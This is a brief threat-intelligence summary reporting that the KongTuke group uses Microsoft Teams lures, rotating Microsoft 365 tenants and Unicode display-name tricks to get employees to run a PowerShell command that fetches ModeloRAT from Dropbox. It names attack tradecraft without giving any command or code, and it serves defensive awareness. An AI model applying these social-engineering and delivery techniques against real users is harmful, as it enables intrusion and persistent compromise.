KongTuke has shifted to Microsoft Teams to carry out social engineering attacks, tricking employees into running a malicious PowerShell command that installs ModeloRAT and can establish persistent access in under five minutes. ReliaQuest says the campaign uses rotating Microsoft 365 tenants, Unicode display-name tricks, and stronger persistence features, making it harder to block and remove. #KongTuke #MicrosoftTeams #ModeloRAT #ReliaQuest
Keypoints
- KongTuke is now using Microsoft Teams for initial access.
- Victims are tricked into running a malicious PowerShell command.
- The command downloads a ZIP archive from Dropbox and installs ModeloRAT.
- The campaign can achieve persistent access in under five minutes.
- ModeloRAT includes improved C2, multiple access paths, and stronger persistence.